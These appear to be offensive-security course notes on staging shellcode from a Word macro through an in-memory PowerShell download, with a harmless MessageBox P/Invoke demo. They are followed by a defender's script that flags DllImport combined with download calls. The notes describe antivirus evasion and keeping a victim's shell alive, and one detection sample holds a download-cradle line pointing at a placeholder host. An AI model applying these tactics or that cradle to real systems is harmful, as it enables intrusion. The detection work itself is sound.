Although we have a working exploit, there is room for improvement.
The Word file contains the first-stage shellcode saved on the hard drive, where it may be detected by antivirus.
The VBA version executes the shellcode directly from Word's memory, which closes our shell as soon as the victim closes Office.
We will change tactics a little.
We will instruct the macro to download a PowerShell script that contains the staged shellcode and run it in memory.
We will launch this script as a child process of Word, which keeps our shellcode alive even when the victim closes Office.
PowerShell cannot directly interact with the Win32 APIs, but through the .NET Framework we can embed C# in our code and call the APIs using the DllImport attribute, which invokes functions exported by dynamic link libraries.

# C# source held in a here-string; Add-Type compiles it into a .NET type
$User32 = @"
using System;
using System.Runtime.InteropServices;
public class User32
{
    // P/Invoke declaration: bind MessageBox from user32.dll
    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    public static extern int MessageBox(IntPtr hWnd, String Text, String Caption, int Options);
}
"@
# compile the class and load it into the current PowerShell session
Add-Type $User32
# call the native API through the static method: hWnd=0 (no owner), uType=0 (OK button only)
[User32]::MessageBox(0, "Rem01x Is Here", "OSEP", 0)
Now let's look at this code and analyze it.

First we created a variable called User32 and assigned it the class definition, which imports user32.dll and declares the MessageBox API so it can be called.

Then we added this new type to PowerShell with Add-Type, and finally we called the MessageBox API as we would any static method.
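From the defender's side, the same Add-Type / DllImport pattern is what shows up in PowerShell script block logs. The following is an added example, not part of the original notes: a small indicator check run over constructed script text (the MessageBox snippet above and a second, constructed sample that also downloads content from a placeholder `.invalid` URL). The function name `Test-DllImportIndicators`, the regex list and the flagging rule are assumptions of this example; the commented-out lookup at the end assumes script block logging (event 4104 in the `Microsoft-Windows-PowerShell/Operational` log) is enabled on the host.

```powershell
# Added example, not from the original notes: check script text for the
# Add-Type / DllImport pattern described above. Runs offline over
# constructed samples; the live event-log lookup is shown in a comment.

function Test-DllImportIndicators {
    param([Parameter(Mandatory)][string]$ScriptBlockText)

    # Indicator name => regex (-match is case-insensitive by default).
    $indicators = [ordered]@{
        AddType    = 'Add-Type'
        DllImport  = '\[DllImport\('
        ExternDecl = 'static\s+extern'
        Download   = 'DownloadString|DownloadFile|Invoke-WebRequest'
    }
    $hits = @(foreach ($name in $indicators.Keys) {
        if ($ScriptBlockText -match $indicators[$name]) { $name }
    })

    [pscustomobject]@{
        Hits = $hits
        # A DllImport compiled at run time inside a script that also fetches
        # content from the network is the combination worth an analyst's look;
        # DllImport on its own is common in legitimate admin tooling.
        Flag = ($hits -contains 'DllImport') -and ($hits -contains 'Download')
    }
}

# Constructed sample 1: the MessageBox snippet from the notes, which is benign.
$benign = @'
$User32 = @"
using System;
using System.Runtime.InteropServices;
public class User32 {
    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    public static extern int MessageBox(IntPtr hWnd, String Text, String Caption, int Options);
}
"@
Add-Type $User32
[User32]::MessageBox(0, "Rem01x Is Here", "OSEP", 0)
'@

# Constructed sample 2: same P/Invoke pattern plus a network download
# (placeholder URL, harmless API) - the combination the check flags.
$suspect = @'
$code = (New-Object Net.WebClient).DownloadString('http://PLACEHOLDER.invalid/stage.ps1')
$Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class K { [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess(); }
"@
Add-Type $Kernel32
'@

$samples = [ordered]@{ benign = $benign; suspect = $suspect }
foreach ($sample in $samples.GetEnumerator()) {
    $r = Test-DllImportIndicators -ScriptBlockText $sample.Value
    '{0}: hits={1} flag={2}' -f $sample.Key, ($r.Hits -join ','), $r.Flag
}

# Live lookup (commented out; requires script block logging enabled and
# read access to the event log). Properties[2] of a 4104 event is ScriptBlockText.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { Test-DllImportIndicators -ScriptBlockText $_.Properties[2].Value }
```

The benign sample trips the Add-Type, DllImport and extern indicators but is not flagged, because compiling a P/Invoke wrapper by itself is routine; only the sample that combines DllImport with a download primitive is flagged. Tune the indicator list and the rule to your own baseline of administrative scripts.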